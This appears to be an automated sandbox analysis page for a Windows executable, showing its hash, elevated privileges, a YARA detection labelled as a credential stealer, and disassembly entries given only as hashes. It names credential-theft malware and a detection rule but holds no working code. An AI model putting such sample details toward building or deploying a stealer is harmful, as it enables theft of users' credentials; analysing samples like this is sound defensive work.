                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJQgWYtFHvKHcm7nnvVc8gFBhz8pL%2FMkJUU1BM%2BDKEPe95TVqo6TnsSjBvOEWwM6nPEc4omlRi0OAq2WpnrGOUpmYY%2FHS7SAIKbc6ofC2%2Fnjo29oBx7HiDf%2BMqV4nIKlMF4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f9b49dd176c-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1501&rtt_var=570&sent=365&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573496&delivery_rate=1908496&cwnd=252&unsent_bytes=0&cid=955ebc3427ed82f5&ts=3590&x=0"


                                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                      Start time:03:40:33
                                                                                                                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\k7T6akLcAr.exe"
                                                                                                                                                                                                                                                                      Imagebase:0xda0000
                                                                                                                                                                                                                                                                      File size:2'951'680 bytes
                                                                                                                                                                                                                                                                      MD5 hash:FCCB91D8F4EF18DA22C21583C82C56C0
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                        Function 0559DA03 Relevance: .9, Instructions: 923COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: bde1dcfb13d3496b6a064f86d846f92e7a0f188200fc66b37e29c5e572ece7de
                                                                                                                                                                                                                                                                        • Instruction ID: 54dd0f26b1ed7580ce3e07d9bde69f5f00bc9b706d24402c3afaeafaeea0931c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bde1dcfb13d3496b6a064f86d846f92e7a0f188200fc66b37e29c5e572ece7de
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFC18CA540E7C29FCB178F38D96A7517F74AF1B214B1A0ADBC0D0CE5A7C159848AC753
                                                                                                                                                                                                                                                                        Function 0559D1DB Relevance: .6, Instructions: 572COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 8ff8a8f05a62bbe572c4ec5e24abc08504a8d35abac8d26fb32c359a0226ade9
                                                                                                                                                                                                                                                                        • Instruction ID: 6013bf84cfed01bd55a9f231ab743d333b45d1b1d4e8d1ddccdefd366195f14e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ff8a8f05a62bbe572c4ec5e24abc08504a8d35abac8d26fb32c359a0226ade9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1D198A284E3D18FD7178B7498766907FB0AE13224B1E45EBC4C4CF4A3E25D485AC7A3
                                                                                                                                                                                                                                                                        Function 055995D3 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: f38cc164aed1cc81ce6fcc2840a065b4650e52e0b308ff492c2f4c5c11d4d0e3
                                                                                                                                                                                                                                                                        • Instruction ID: 14951baa8a9fda9f1d2d5e1fab015d0a89e268ffde4eea6ce8100e62f6c80874
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f38cc164aed1cc81ce6fcc2840a065b4650e52e0b308ff492c2f4c5c11d4d0e3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7181113400D2D69FCB1BCF38CAA5A96BFB1BF43214B1D06DDD8C28E263C2696545C796